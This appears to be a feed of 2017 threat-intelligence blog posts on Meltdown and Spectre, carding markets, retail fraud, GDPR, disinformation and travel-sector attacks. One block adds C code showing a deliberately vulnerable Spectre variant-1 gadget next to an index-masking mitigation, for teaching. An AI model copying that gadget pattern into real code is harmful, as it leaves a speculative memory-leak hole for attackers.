    • These flaws are not exclusive to Intel processors. Spectre also affects AMD and ARM designs, while Meltdown primarily affects Intel (AMD has stated its processors are not susceptible to it). Cloud environments are also at risk, as an attacker could break out of one tenant’s process and read data belonging to other processes running on the same shared server.
    • Patches for Meltdown have been released; however, there is currently no specific patch available for Spectre, which will likely require a hardware fix to mitigate completely. The US CERT certainly seems to think so.

    What we don’t know about Meltdown and Spectre

    • Although the general consensus is that nearly every processor commonly in use today is at risk, the full extent of which systems and platforms are affected is still unknown.
    • How easy is it to exploit these flaws? There have not been any reports of Meltdown or Spectre attacks being performed in the wild for malicious purposes. While the Spectre POC code functioned correctly in Digital Shadows’ analysis, that POC reads memory within its own process; the intricacies and feasibility of mounting a speculative execution attack against another process or machine under real-world conditions are still unclear.
    • How can threat actors leverage Meltdown and Spectre for their attacks? The exploit scenarios are some of the biggest unknowns. The nature of the vulnerabilities leads to the exposure of sensitive data such as encryption keys and passwords, so future attacks would likely involve attackers stealing this information and then using it to take over machines and accounts. Internet of Things (IoT) devices are also susceptible, as they run the same types of processors, and people are less likely to update them the way they would their personal or work computers. A dedicated attacker could use these vulnerabilities to extract credentials from IoT devices; it was weak and default credentials on such devices that enabled the Mirai botnet.
    • Criminals do not need to use Meltdown and Spectre for their attacks if they can profit in other ways. We have seen actors discussing the sale of the exploits on the Shadow Brokers’ “Scylla Hacking Store” for $8,900. This is likely to be the first of many claimed sales across the dark web and criminal forums, as cybercriminals look to profit from the media attention and hysteria around these discoveries.

    Meltdown and Spectre exploit advertised for sale by the Shadow Brokers 


    What you can do about it

    A host of companies have come out and released advisories for their affected products. We have provided a list of these and their relevant websites below:

    1. Intel
    2. Microsoft
    3. Google
    4. Amazon
    5. ARM
    6. Android
    7. Mozilla
    8. Linux
    9. Red Hat
    10. Apple

    Patching and rebooting should therefore be a priority requirement for all organizations and home users. Despite this, there are a few things to bear in mind:

    • Spectre cannot yet be completely mitigated against through patching,
    • These mitigations will affect system performance and slow down machines. You will want to test out the mitigations prior to deploying them.
    • Mitigating a hardware flaw with software is very difficult, and the patches can conflict with other software running on the system (e.g. endpoint protection products that hook the kernel).

    These patches are only preliminary measures though, and there will probably be future updates released to combat the performance problems caused by these fixes.
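    The Spectre “bounds check bypass” variant (CVE-2017-5753) discussed above is a property of ordinary-looking code, which is why it cannot be patched once in the kernel the way Meltdown can. The following is an added example, not code from the original post or from the Spectre whitepaper: the vulnerable lookup pattern beside a branch-free index mask of the kind the Linux kernel later shipped as array_index_nospec(). The table contents are constructed sample data, and nothing here measures cache timing, so the two lookups return identical values in a functional test; they differ only in what a mispredicted branch is able to touch.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TABLE_SIZE 16
#define STRIDE 512

/* Constructed sample data: an in-bounds lookup table. Whatever sits in
 * memory past its end plays the role of the "secret" in a real attack. */
static const uint8_t table[TABLE_SIZE] = {
    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
    0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f,
};

/* The second array an attacker would later time (Flush+Reload) to learn
 * which line the victim touched. Filled so probe[v * STRIDE] == v. */
static uint8_t probe[256 * STRIDE];
void probe_init(void)
{
    for (size_t v = 0; v < 256; v++)
        probe[v * STRIDE] = (uint8_t)v;
}

/* volatile forces a real memory load of the bound, which gives the CPU a
 * window in which the comparison is unresolved and the branch is predicted. */
static volatile size_t table_size = TABLE_SIZE;

/* Vulnerable gadget (variant 1 pattern): architecturally correct, but while
 * table_size is still being fetched the CPU may speculatively run the body
 * with an out-of-range idx, pulling probe[secret * STRIDE] into the cache. */
uint8_t lookup_vulnerable(size_t idx)
{
    if (idx < table_size)
        return probe[table[idx] * STRIDE];
    return 0;
}

/* Branch-free clamp: returns idx if idx < size, otherwise 0.
 * Assumes idx and size are both below 2^63 (true for any real array).
 * Because the result is computed arithmetically instead of by a predicted
 * branch, even a misspeculated path can only use an in-range index. */
size_t nospec_index(size_t idx, size_t size)
{
    const unsigned top_bit = sizeof(size_t) * 8 - 1;
    /* size - idx - 1 wraps negative exactly when idx >= size */
    size_t out_of_range = (idx | (size - idx - 1)) >> top_bit;   /* 0 or 1 */
    size_t mask = (size_t)0 - (out_of_range ^ 1);                 /* all ones or zero */
    __asm__ __volatile__("" : "+r"(mask));  /* stop the compiler turning this back into a branch */
    return idx & mask;
}

/* Hardened lookup: the bounds check stays (it is still needed for correctness),
 * but the index actually used for the memory access is masked first. */
uint8_t lookup_hardened(size_t idx)
{
    if (idx < table_size)
        return probe[table[nospec_index(idx, table_size)] * STRIDE];
    return 0;
}

int main(void)
{
    probe_init();
    printf("in range  : vulnerable=%#x hardened=%#x\n",
           lookup_vulnerable(3), lookup_hardened(3));
    printf("masked idx: 3 -> %zu, 16 -> %zu, 1000 -> %zu\n",
           nospec_index(3, TABLE_SIZE), nospec_index(16, TABLE_SIZE),
           nospec_index(1000, TABLE_SIZE));
    return 0;
}
```

    Build with `cc -O2 -o spectre_v1 spectre_v1.c`. The point a practitioner should take from this is that the mask has to be applied at every such gadget in a code base, not once centrally; that is why the mitigation work for Spectre fell on kernel and compiler developers and why the post is right that patching alone cannot close it completely.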

    What we can be certain of is that this issue will run on for a considerable length of time. Digital Shadows will continue to post updates on both Meltdown and Spectre as and when new information becomes available. Happy New Year!

    What Attackers Want for Christmas Fri, 22 Dec 2017 16:41:56 +0000 Our guest author Krampus has a special blog post for the Team with the festive Red colours:

    Christmas lists are always a problem; here are some examples to get attackers thinking during the holiday season:

    • Leaked (NSA) exploits: ETERNALBLUE, ETERNALROMANCE and friends have been a rare delight this year, bringing a smile to the lips of ol’Krampus. The destruction wreaked by WannaCry, NotPetya and BadRabbit has spoken to the power of these leaked exploits. There’s nothing that Krampus likes better than gaining SYSTEM privileges directly over the network!
    • Vulnerable Supply Chain: Big or small, secondary or tertiary, supply chains have been this year’s go-to attack vector. Krampus likes to go for the weakest link in the supply chain and pivot up from there into the target, exploiting highly-connected vendors, subsidiaries and suppliers to reach the goal.
    • Poorly trained workforce: The human element is what gets naughty children on Krampus’ list and Krampus loves the organizations that help to get them there! Not training the workforce to pick up on social engineering attacks, and terrifying them about the consequences of making a mistake, is a fantastic way to help attackers get what they want for Christmas.
    • Credential hygiene: While exploits are effective, other methods of gaining access shouldn’t be ignored. Poor credential hygiene has been exploited by worms like NotPetya with tremendous effect. By taking advantage of password reuse, especially for accounts with Administrator privileges, attackers have been able to compromise environments at scale in a matter of minutes. An all-time Krampus favourite!
    • Data breaches: Nothing warms Krampus’ blackened heart more than the theft of hundreds of millions of sensitive records. Data breaches provide such wonderful opportunities for theft, fraud, account takeover, credential reuse and extortion! They happen with a pleasing regularity and Krampus can only say: “bring ‘em on!”.
    • False positives: An organization may have a SOC, but luckily for ol’Krampus, they are typically flooded with false positives, which allows Krampus and friends to rampage unimpeded through their preferred targets. Misconfigured logging systems create a noisy environment where the defenders can’t see the danger until Krampus is long gone! A trusted and loyal friend over the years!
    • Target-rich environments: Once inside a particular environment, it’s always preferable for there to be a lack of segmentation so that exploits and credential reuse can be used to find vulnerable systems. In particular, sensitive data should be available in as many different places as possible and accessible by as many users as possible. This way Krampus doesn’t have to be that specific in his targeting; the naughty list can be as long as you like!

    In order to keep Krampus and his hordes out of your network, we recommend robust security engineering principles to defend your networks:

    1. Default deny: that is, “only provide access where it has been explicitly granted, otherwise deny”.
    2. Least Privilege: that is, “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job”.
    3. (Attack) Surface Reduction: that is, reduce the amount of services running, the number of privileged users and the number of entry points into the system.
    4. Need to Know/Compartmentalization: that is, only grant access where there is an explicit business requirement to do so.
    5. Defence in Depth: that is, not one single control is sufficient to adequately protect a system. Careful usage of the other four principles in physical, technical and administrative controls will go a long way to keeping Krampus out!

    You can find out more about these principles in a previous post we have written on the importance of security engineering.

    OL1MP: A Telegram Bot Making Carding Made Easy This Holiday Season Thu, 21 Dec 2017 16:12:04 +0000 Back in July, we published our research on the carding ecosystem, specifically on an online course that teaches carders how to successfully commit fraud. “Carding” refers to the process of using stolen credit cards to purchase goods or services, which can then be sold on at a reduced price in order to clean the money. Since the demise of AlphaBay and Hansa marketplaces, fraudsters have looked for new platforms to sell these carded goods and services.


    Figure 1: The OLYMP/OL1MP Telegram Marketplace

    Digital Shadows’ intelligence analysts have identified a Telegram market gaining traction called “OL1MP”. OL1MP has been active since August 2017 and looks to provide a new format for buying and selling these goods and services, made easy by a bot that automates browsing of the shops. OL1MP has a wide range of items for sale, including discounted hotels, drugs, taxis, driver’s licenses and documents; the latter offering includes counterfeit press passes for events.

    On the back of the recent surge in Bitcoin, the market also offers cryptocurrency exchange. But it’s not the first Telegram channel to get involved in the trade of cryptocurrencies. Last month, we released research on the “Pump and Dump” schemes that seek to manipulate the price of currencies like UBQ, VCash, Chill Coin, Magi Coin, and Indorse.

    Telegram has been increasing in popularity among cybercriminals, who favor the privacy offered by its encryption. The platform is also very user friendly, and the OL1MP market is no exception. The following figures demonstrate the flow a buyer takes in choosing a service on the OL1MP market, in this case for discounted travel.

    Figure 2: Starting the OL1MP bot, with options “About the project, Escrow, Dope Shops, Services, Holidays, Taxi”


    Figure 3: With “Holidays” selected, the user is able to choose from three verified providers of travel


    Figure 4: Selecting one option, Rick Travel, takes the user to the specific group for that seller. In this case, users can book hotels for 30% of their value and flights for 50%.


    OL1MP ties in this automated effort with a human touch. As with most marketplaces, reviews are important for attracting new customers. In fact, extra discounts are available for those individuals who post pictures and positives comments from their carded holidays.

    In some instances, hotel booking agencies (among other victims) may detect this suspicious activity and cancel the reservation. So, while the functionality of this automated bot is an interesting innovation, there is still a need for human support. In addition to the creator of the OL1MP bot, the Telegram group has others who offer support on a separate channel.

    Figure 5: The profile of OL1MP’s creator


    Carding is not new, but fraudsters continually look for new ways to sell and buy carded items. The shift to Telegram is part of a broader trend, as criminals look for secure but effective ways to promote their goods and services. You can learn about what payment card companies, merchants and consumers can do to protect themselves from carding.

    ‘Tis The Season To Do Predictions – The 2018 Cybersecurity Landscape Mon, 18 Dec 2017 18:09:23 +0000 This post originally appeared on Huffington Post.

    Every year around this time all the security businesses and analysts leap for their crystal ball and attempt to predict what we should be worrying about in the coming 12 months or more. And the sad reality is that not a lot will change as there is not much need for the cybercriminal community to do anything different – it’s already working well now!

    The cybercriminal community is all about profit and that means they continue to utilise the same sorts of tactics if they continue to gain the results they are after – mainly money!

    That said though, how will the threat landscape look like over the next 12 months?

    • Supply chain and third party attacks have been a common feature in 2017 and will continue to be a fruitful attack method for cybercriminals in the next year. These tend to be highly focused operations with predetermined targets of interest, rather than cases of mass, indiscriminate targeting. Nevertheless, the Oracle MICROS breach that affected its point of sale customers and the NotPetya campaign were outliers in this regard. This is probably due to the differing motives of these campaigns: supply chain attacks are often done for intelligence gathering and reconnaissance purposes, whereas the MICROS and NotPetya attacks were financially motivated or disruptive, so the emphasis would have been on widening the number of targets for maximum effect. Suppliers and third parties are often seen as easier entry points for attackers, especially as many do not have adequate security maturity levels. Moreover, suppliers are often given unnecessary wholesale access to company networks, which is why they are targeted in the first place.
    • Wormable malware – Some of the biggest cyber incidents in 2017 revolved around self-replicating malware that can spread between networks. WannaCry and NotPetya were examples of this. As well as these we’ve seen the Bad Rabbit ransomware, which reportedly spreads via a combination of Windows Management Instrumentation (WMI) and the Server Message Block (SMB) protocol, and a wormable Trickbot banking trojan was also reported in July 2017.

    I expect malware modified with self-replicating capabilities to continue in 2018, particularly given the disruption caused by WannaCry and NotPetya inspiring similar attacks. Another driver for this is that many organizations around the world will be slow to mitigate against these methods, whether by applying appropriate patches and updates, restricting communication between workstations, or disabling legacy features such as SMBv1 to reduce the capability of malware to propagate within organization networks.

    The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate from and leverage to aggressively accomplish their goals.

    But whatever happens in 2018 and beyond, what is clear is that cybercrime will continue to be a problem and present governments, businesses and individuals with challenges to protect their data and their intellectual property. It is therefore critical that you take steps to manage your digital footprint and the digital risk you present to the world via your business activities on the internet and via cloud solutions. That way, when something bad does happen, you will know quickly and can deal with it more effectively.

    Why I Joined Digital Shadows: Product, Culture and Opportunity Wed, 13 Dec 2017 18:51:02 +0000 Making the decision to join Digital Shadows was actually relatively straightforward for me, as it was impossible to turn down this unique opportunity. My decision came down to 3 main factors – product, culture, and the opportunity ahead.

    Product and Timing:

    The space we operate in is growing, and maturing, rapidly. While others are concentrating their efforts solely on social media or dark web threats, Digital Shadows SearchLight™ offers unique insight into the risks facing an organization across the broadest range of areas in our industry. This extensive coverage, coupled with our intelligence analyst expertise, allows our clients to gain a full picture of their external digital risk, without false positives, and with mitigation options. This empowers practitioners in a way that was not possible before.

    Culture and People:

    Our Co-Founders, Alastair Paterson and James Chappell, have built a truly exceptional and unique team and culture at Digital Shadows. The passion and enthusiasm that the whole company has for our SearchLight product and our clients is truly infectious. Throughout the interview process I was pleasantly surprised at how consistently the vision of Digital Shadows was echoed by those I met. The passion that the team has to ensure our clients are successful is key to our own success. That passion, through the analysts that overlay our technology, makes us truly unique in the marketplace.

    The Opportunity Ahead:

    The cyber security and digital risk industry is maturing quickly and we have a great opportunity through the Client Success team to differentiate ourselves from our competitors.  Through our SearchLight product and ability to build lasting trusted advisor relationships with our clients, we can ensure that their digital risks are clearly understood.


    I’m very excited about my next adventure, and look forward to creating a delighted client experience for everyone that chooses to work with us at Digital Shadows.

    A New CISO Looking to See How Deep the Rabbit Hole Goes Tue, 12 Dec 2017 17:10:06 +0000

    Well, it is official: I’m now the Chief Information Security Officer here at Digital Shadows. It has been a while since I was on the practitioner side of the house, and my days defending networks at the University of Texas at Dallas seem like ages ago. When I was at Forrester Research, I often joked about how much easier it was to parachute in, give some industry analyst words of wisdom and then head back to the airport. It is much easier “to say” than “to do.” The Heartbleeds, WannaCrys, and BadRabbits of the world are going to mean significantly more to me in my new practitioner role. It’s almost as if Morpheus is greeting me with a red pill, welcoming me back to the real world.

    I’ve worked with many CISOs over the years. From the Forrester Leadership Boards, to our own Customer Advisory Board here at Digital Shadows, I’ve found myself in a position to give out security program suggestions and advice to CISOs. To be honest, I always felt like a bit of an impostor; giving advice to a security and risk leader when I hadn’t been one myself. Sometimes I felt analogous to that one friend without children, who gave out parenting advice on how to get a threenager to eat more vegetables. For those with kids you know exactly what I’m talking about. Why don’t you try walking a mile in my shoes before you give me your #protips.

    I’m grateful for the opportunity and I’m very excited about this new role, as it demonstrates Digital Shadows’ commitment to our customers’ security and privacy. I’m also very appreciative of the CISO network I’ve built up over the years. I will definitely reach out to my new peers for guidance and support on this new path. I also plan to blog more about my journey in the hope that I can share my personal lessons learned with any other first-time CISOs looking for guidance. Stay tuned for more.

    Digital Shadows’ Most Popular Blogs of 2017: Analysis of Competing Hypotheses For The Win Tue, 12 Dec 2017 05:55:06 +0000

    This time last year, we looked back at the blogs that caught our readers’ attention the most. In 2016, it was our Analysis of Competing Hypotheses of the Tesco Bank incident that reached the top of the pile. In 2017, it was yet another ACH that topped the Digital Shadows blog charts.

    1. WannaCry: An Analysis of Competing Hypotheses

    In May, the WannaCry ransomware spread across computer networks across the world. Despite a range of explanations offered, there was a lot of confusion as to the actors behind the campaign and their objective(s).

    Using ACH, our analysts recorded their assumptions, evidence and hypotheses on one matrix. This identified the hypotheses that were least likely to be valid. (In the end, we actually posted an additional, updated ACH as more evidence emerged:

    This structured approach is significant as it facilitates easier collaboration and peer review. Indeed, we were happy to see others getting involved with ACHs, including a SANS Internet Storm Center handler who did some excellent additional analysis in this area.

    ACH can’t be used in all circumstances, but the transparency it provides is useful and aligns with the values of intelligence tradecraft that Jim Marchio espoused in his paper ‘Analytic Tradecraft and the Intelligence Community: Enduring Value, Intermittent Emphasis’.

    For those ACH nerds out there, you can view all the ACH’s we’ve done here:

    2. Equifax Breach: The Impact for Enterprises and Consumers

    This was arguably the biggest story of 2017, so it’s only understandable that this blog attracted plenty of readers. When events like this break, it’s always tricky to find the correct balance between a quick response and providing accurate and useful information. We’ve found that transparency helps here and use the following structure:

    1. What we know
    2. What we don’t know
    3. What we expect to happen next

    By taking this approach, we can cut through the hype and identify intelligence gaps. It’s definitely a structure we’ll be using for future breaking events.

    For those interested in lessons we can learn from the Equifax breach, check out this short paper we published:

    3. Innovation in The Underworld: Reducing the Risk of Ripper Fraud

    The final of the top three blogs of 2017 focused on the cybercriminal ecosystem, and the mechanisms criminals have in place to detect fraud from other criminals.

    Those who commit this type of fraud are known as “rippers” and there are several mechanisms in place to protect against them, including blacklists. One service, called ripper[.]cc, is an innovative approach to identifying rippers, demonstrating how professionalized the cybercriminal ecosystem has become. Ripper[.]cc allows users to identify profiles that have been previously reported, and to do so across different platforms. There’s even a Chrome plugin to make this easier still. You can read more about ripper[.]cc in this blog:

    Check out these three blogs and keep an eye out for the exciting research we have planned for 2018.

    Meet the New Wed, 29 Nov 2017 05:09:04 +0000 This morning we launched the new Digital Shadows website. Our main goal in creating this new website was to make it a valuable resource for the many security leaders and practitioners, board members, and executives who visit our website each day. We wanted to provide a view of how we are partnering with our customers to protect their companies from digital risks across the open, deep, and dark web. These digital risks include cyber threats, data exposure, brand exposure, VIP exposure, infrastructure exposure, physical threats, and third party risk. We wanted to share these customer stories as we find that organizations both large and small, across every industry and geography, are all facing a similar and very hard task. The team here at Digital Shadows is incredibly focused on helping our customers solve these problems every day.

    We hope you enjoy our new website experience. Here are some highlights:

    1. Our new modern interactive home page with significantly more valuable content


    2. A deeper SearchLight portal experience so you can get a feel of how our service can help you monitor, manage, and remediate digital risks
    (Just scroll down on the Home Page)


    3. A more personalized experience designed for your role, vertical, and company size


    4. A fantastic resource center that houses all of the great content our team has created that we hope is valuable to you

    Risks to Retail: Cybercriminals Sharing the Joy This Holiday Season Tue, 21 Nov 2017 23:41:33 +0000 Despite some early deals, Black Friday officially begins on 24th November, kick-starting over a month of consumer spending over the holiday period. This year, it’s expected that a whopping $862 billion will be spent during this season. A significant chunk of this is online sales, with $116 billion set to be spent. Cybercriminals also look to get a slice of the holiday sales action.

     Cybercrime and the holiday season

    In our recent webinar and whitepaper, we identify cybercrime risks to retailers and consumers:

    1. Payment Systems Risk – How cybercriminals acquire payment card information, through Point of Sale (POS) malware and skimming.
    2. Fraudulent Transactions – The monetization of this payment card information, through Card Not Present (CNP) fraud and eGift cards.
    3. Account Takeover – Fraudsters that look to log in to consumers’ accounts, whether with retailers or payment platforms. Phishing and credential stuffing are the prime techniques for this.
    4. Loss of Service – With so much money spent online, Distributed Denial of Service (DDoS) is a real threat to retailers. Cybercriminals know this and look to extort companies with it.

    Amid all of these risks, criminals look to help each other out. For example, in one instance an actor shared templates for phishing pages (Figure 1) on a criminal forum. This scam page is well made and has some interesting functionality, including prompting victims to “verify” themselves by uploading ID cards and passport photos, and auto-redirecting victims to the legitimate site afterwards so the fraud is less likely to be noticed. With this template available for free, actors need only register a convincing-looking domain.


    Figure 1: An advertisement for a phishing “scampage” on a criminal forum.


    Figure 2: A screenshot of the ID upload feature from a demonstration video, which allows attackers to harvest additional information.

    Fraudsters also share software. In Figure 3 we see the AntiDetect tool, which any carder worth their salt will be using. Carders know that retailers use device fingerprinting to detect fraudulent transactions, so the ability to rotate and quickly change browser attributes like browser type, version, language, time zone, and user agent lets each fraudulent session look like a different, previously unseen customer. You can read more about this particular tool in an article by Brian Krebs.



    Figure 3: The AntiDetect tool to overcome browser fingerprinting controls.

     Of course, there are criminals that look to exploit this interest in tool-sharing by disguising malware as carding tools. Figure 4 is an example of an actor claiming to share such tools – in this case a PayPal email checker. Unsuspecting downloaders may get more than they bargained for when downloading this .exe file. It’s a cliché, I know, but there’s no honor amongst thieves.



    Figure 4: A tool to “check email paypal” available for download and advertised on criminal forums.

    Nevertheless, with criminals so open to sharing so many tools and tactics, it’s a reminder to organizations to do the same; make use of sharing communities such as R-CISC and InfraGard to stay abreast of the latest criminal approaches.


    You can watch our webinar or download our latest whitepaper to learn more about these tactics and tools, as well as tips for retailers and consumers to follow in order to mitigate these risks.

    GDPR – Not Just a European Concern Mon, 20 Nov 2017 23:37:13 +0000

    This post originally appeared on SecurityWeek.


    The recent Equifax breach that has been all over the news raises an interesting question: How would the situation have played out if it was after May 25, 2018 when the new General Data Protection Regulations (GDPR) are due to come into force? While none of us has a crystal ball, we can bet the outcome for Equifax would be even worse.

    This report provides comprehensive information on the GDPR but, in brief, the GDPR is a new set of regulations to protect the personal data and privacy of citizens of EU countries. It will affect any company that processes personal data of EU citizens – even if that company doesn’t have a presence in an EU country – making this legislation more than a European concern. To begin with, the regulations set a high standard for the speed with which businesses are required to report data breaches, in some cases within 72 hours after becoming aware of the breach. Companies also have to comply with each of these rights, transparently and without cost to EU citizens:

    • Right of data portability – if a customer asks for their data you are required to provide it
    • Right of removal – if a customer requests that their information be removed from your systems you are required to do so
    • Data transfer notification – prior to sharing customer data with a third party, you must notify the customer and gain explicit consent to share it
    • Customer access requests – if a customer asks whether or not you hold data on them, you are obligated to let them know

    To satisfy the GDPR regulations, companies will likely need additional processes, technology and personnel in place. In a survey by PwC of U.S. companies, nearly 70% of respondents said they plan to spend between $1 million and $10 million to address GDPR obligations. While that may sound like a lot, it could pale in comparison to fines. Failure to comply with the GDPR can result in hefty financial penalties of up to 4 percent of global turnover or 20 million Euros (more than $23 million), whichever is greater in certain instances. For companies operating with razor-thin margins, profits could easily evaporate into thin air.

    The need to comply with data privacy regulations is nothing new to U.S.-based companies. In fact certain states like California and Delaware have particularly strict rules around online data privacy. Further, the U.S. Department of Commerce has worked for some time to synchronize privacy legislation between the U.S. and the U.K. so that trade (mostly online) can be conducted successfully in the joint interest of both groups. This led to the creation of the EU-U.S. Privacy Shield Framework designed to give concurrency to protection, meaning the same level of protection for EU citizens whether in the EU or the United States. Companies based in the U.S. can self-certify that they provide “adequate” privacy protection and then must comply with the Framework’s requirements.

    GDPR continues some of the core principles set out by this earlier legislation which helps ease the transition for companies that have maintained compliance. But differences including the 72-hour reporting deadline, exactly how ‘personal information’ is defined and the broader rights granted to EU citizens must be considered. So what can U.S.-based companies do to prepare for the GDPR? These five steps can help:

    1. Understand what data you have and where it is. Make sure you understand what data you hold on EU citizens.  If you don’t hold data on EU citizens then you need not concern yourself with the GDPR, but given the global nature of business this is unlikely to be the case. If you do hold EU citizen data then consider this: every company has a certain amount of data loss, yet many aren’t aware that they’ve already been breached. If you don’t already do so, proactively monitor sites on the open, deep and dark web for your customers’ information. Understanding any data leaks and addressing them now will give you a clean start when the GDPR goes into effect next year.
    2. Engage in supply chain security. Most businesses have a long supply chain. For example, it isn’t unusual for a Tier 1 financial institution to have 15,000 suppliers/partners who quite often hold proprietary information on the institution’s customers. Under the GDPR, both data controllers and data processors have protection and privacy obligations to EU citizens. Make sure your company’s security guidelines and controls with suppliers are adequate and that your suppliers are in compliance and following best practices.
    3. Complete the EU-U.S. Privacy Shield self-certification process. It is still unclear whether or not the EU-U.S. Privacy Shield Framework will continue. However, companies that are self-certified when the GDPR goes into effect can demonstrate a commitment to protecting the data and privacy of EU citizens. This puts you further down the path of compliance with the GDPR and on more solid footing to continue business with EU companies and citizens during the transition.
    4. Establish GDPR compliance processes now. You need to establish and test processes in advance to ensure you know how and who to notify in the event of a breach. With only 72 hours to spare, you can’t afford to wait and figure it out ‘on the fly.’ Additionally, make sure you have identified processes to support all the other rights of EU citizens under the GDPR including data portability, removal, transfer notifications and access requests. Consider appointing a data protection officer to oversee these efforts.
    5. Seek legal counsel. All of these changes require considerable thought, time and effort. Before you go too far down the path of implementing processes and any supporting technologies required, seek professional legal advice to ensure that your chosen approaches suitably address the legislation.

    Crystal ball or not, it’s clear that the GDPR is not just a European concern. What’s not yet clear is how quickly or severely the Information Commissioner’s Office will treat non-compliance in the early part of the legislation. Regardless, given the scope of requirements, affected U.S.-based companies should start to prepare now to mitigate risk.

    Fake News is More Than a Political Battlecry Thu, 16 Nov 2017 23:25:03 +0000 This week, British Prime Minister Theresa May came out and attacked Russia’s attempt to “weaponize information” in hostile actions against western states. This comes on the back of a wave of news that’s covered “fake news” and the U.S. elections. At the latest count, Russia-linked Facebook posts reached 126 million users during the U.S. election period. This makes great headlines and fascinating reading, but what does it all mean?

    We must remember that the use of social media bots is nothing new. Nor is influencing elections; even using social media to influence the outcome of an election isn’t particularly new.

    Our latest paper covers four areas:

    1. Disinformation is different than fake news;
    2. Disinformation campaigns have financial motivations too;
    3. There are a wide range of tools available, which extend beyond social media;
    4. Understanding these motivations and tools allows us to look to disrupt disinformation campaigns.



    Let’s get a boring, semantic (yet important) clarification out of the way. Fake news and disinformation are different, albeit related, terms. The confusion between the two terms holds us back from having a sensible conversation.

    Fake news refers to all manner of things, including disinformation campaigns, partisanship, and honest journalist errors. Disinformation campaigns are specifically those that deliberately spread false information in order to deceive their target or audience.

    One of the greatest quotes on this comes from the former Director of Department X for the East German foreign intelligence: “Our friends in Moscow call it ‘dezinformatsiya’. Our enemies in America call it ‘active measures,’ and I, dear friends, call it ‘my favorite pastime.’”

    This need not be limited to the geopolitical sphere; it can apply to ideological and financial motivations too.


    It would be wrong to assume that the sole target of disinformation campaigns is the electorate and political parties. Given how easy it is to access and wield these online tools, organizations can easily be slandered and their share prices can change. We’ve seen such activities already, particularly surrounding BioTech companies and accusations about the role of Martin Shkreli and an online actor named Art Doyle.

    Actors might not even need to get into the weeds of these tools. TheInsider is a dark web “Pump and dump” service that encourages users to invest in their scheme. The scheme itself looks to manipulate interest in cryptocurrencies to pump up the price and sell shares for profit.


    Disinformation TheInsider

    Regardless of the motivation behind disinformation campaigns, these do not happen in isolation. Instead, malicious actors take advantage of a wide range of tools available at a very low barrier to entry.


    Digital Shadows’ Disinformation Campaign Taxonomy is based on a three-stage attack chain (creation, publication, and circulation), which includes an overview of the methods, tactics and tools associated with running such an operation.

    Taxonomy of Disinformation

    By using Digital Shadows’ Disinformation Campaign Taxonomy, we can see that there are different stages that defenders can target to help disrupt disinformation campaigns in their infancy. Early identification of these campaigns is critical to increase the likelihood of successful disruption.

    Download a copy of our latest research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.

    Why “Have a Safe Trip” Is Taking On Greater Meaning Tue, 14 Nov 2017 23:19:04 +0000 This post originally appeared on SecurityWeek.

    Have a safe trip! Typically, when we wish someone well before they leave on a journey we are referring to their physical safety while in transit. But, increasingly, there’s another consideration – their online security.

    Over the past year, compromises of payment card data from Point-of-Sale (POS) systems, network intrusions against third-party suppliers, and cyber espionage campaigns against visitors using hotel Wi-Fi networks have plagued the travel and hospitality industries. In the spirit of “forewarned is forearmed,” let’s take a closer look at some of the most notable examples of each of these types of threats and how firms in these industries can mitigate risk.

    POS attacks:

    Financially-motivated actors seeking to compromise payment card details use malware to extract this data from POS systems or devices as well as physical skimming devices. Based on the 20 POS malware variants that have been documented and numerous reports of breaches, the travel and hospitality industries have been under siege. In the last six months alone a new variant, MajikPOS, and modifications to the RawPOS variant and the Zeus banking trojan targeting POS systems, have emerged. Since August 2016, POS attacks have reportedly affected 37 Best American Hospitality Corporation restaurants, 62 Kimpton hotel locations and an unknown number of Chipotle Mexican Grill locations. Threat actors focused on these industries include FIN7, TA530 and Vendetta Brothers who each use a range of tactics, techniques and procedures (TTPs). As an example, the threat group FIN7 targets the hospitality industry through the following TTPs:

    • Spearphishing emails containing malicious Microsoft Office documents
    • Social engineering methods to ensure targets open an attachment and initiate the infection process
    • Macro-enabled documents that download initial backdoor payloads onto recipient machines to allow for continued access to systems
    • Malware to move laterally through compromised networks

    Network intrusions:

    The most high-profile network intrusion in the past year involved a compromise of the Sabre Corporation, reportedly affecting at least eight hospitality companies. Through unknown means, the attackers had accessed account credentials that permitted access to payment card data and information for some reservations processed by Sabre’s central reservation system. The company stated that not all compromised records included CVV numbers, and that no personal information, such as social security numbers, passport numbers, or driver’s license numbers, was accessed. This attack demonstrates a trend of third-party supplier attacks in which financially-motivated actors impact multiple companies by compromising their supplier to access sensitive or valuable data.

    Wi-Fi network compromise:

    Threat actors have also targeted hotel Wi-Fi networks in an information gathering and cyber espionage campaign against travelers to Europe and the Middle East. Threat actors almost certainly choose to target these networks because they are deemed less secure and can be leveraged to perform additional actions, such as stealing credentials and moving laterally within networks. In this particular campaign, spearphishing emails were used to deliver information-harvesting malware to victims. The attackers also purportedly used the EternalBlue exploit, which targets the vulnerable Microsoft Server Message Block (SMB) protocol for lateral movement within target networks.

    So what can you do to mitigate risk?

    Layer security:

    • While the Europay, Mastercard and Visa (EMV) chip technology has made physical card fraud more difficult, online card spending is on the rise. Consider using 3D Secure as an additional layer of security which has proven to be a real obstacle for criminals and is deployed by Visa and Mastercard.
    • To prevent lateral movement once inside the network, restricting workstation-to-workstation communication by using host-based firewall rules is also encouraged where feasible.
    • Implement an enterprise password management solution – not only for secure storage and sharing but also strong password creation and diversity to mitigate the risk of credential compromise.


    • With the help of Google Alerts or open source web crawlers like Scrapy, monitor for mentions of your company on cardable websites (sites that track those that are susceptible to fraudulent purchases as a result of lax security controls).
    • Monitor for mentions of suppliers’ names on the open, deep and dark web to help identify if key partners are being targeted by threat actors and if such activity may put your organization at risk.
    • Proactively monitor for credential dumps relevant to your organization’s accounts.


    • Routinely train employees about the risks of spam and spearphishing and how to avoid becoming a victim.
    • Because employees often reuse corporate credentials for personal use, establish and communicate policies that restrict which external services are allowed to be associated to corporate email accounts. Encourage staff to use consumer password management tools like 1Password or LastPass to also manage personal account credentials.

    Address vulnerabilities:

    • Patching is an important part of your defense strategy and failing to do so opens the door wide for adversaries. For example, Microsoft has issued a patch for the vulnerabilities exploited by EternalBlue. Application of these patches prevents the exploitation of the SMB network service.
